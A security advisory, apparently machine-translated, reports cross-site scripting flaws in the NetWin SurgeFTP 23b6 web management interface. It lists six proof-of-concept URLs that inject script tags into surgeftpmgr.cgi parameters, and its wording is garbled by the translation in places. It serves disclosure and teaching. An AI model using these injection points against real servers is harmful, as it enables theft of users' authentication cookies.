Release date:
Updated on:
Affected Systems:
NetWin SurgeFTP 23b6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49160
SurgeFTP is an FTP service program that provides management interface programs.
Multiple cross-site scripting vulnerabilities exist in the implementation of SurgeFTP Web interfaces. Remote attackers can exploit this vulnerability to execute arbitrary script code in the user browsers of the affected sites to steal Cookie authentication creden.
<* Source: Houssam Sahli
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = log & domainid = 0 & fname = "<script> alert ('xss'); </script>
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = log & domainid = 0 & last = "<script> alert ('xss'); </script>
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = class & domainid = 0 & class_name = "<script> alert ('xss'); </script>
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = report_file & domainid = 0 & filter = "<script> alert ('xss'); </script>
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = user_admin & domainid = "<script> alert ('xsss'); </script>
Alert ('xss ');Http://www.example.com/cgi/surgeftpmgr.cgi? Cmd = class & domainid = 0 & classid = "<script> alert ('xss'); </script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
NetWin
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://netwinsite.com/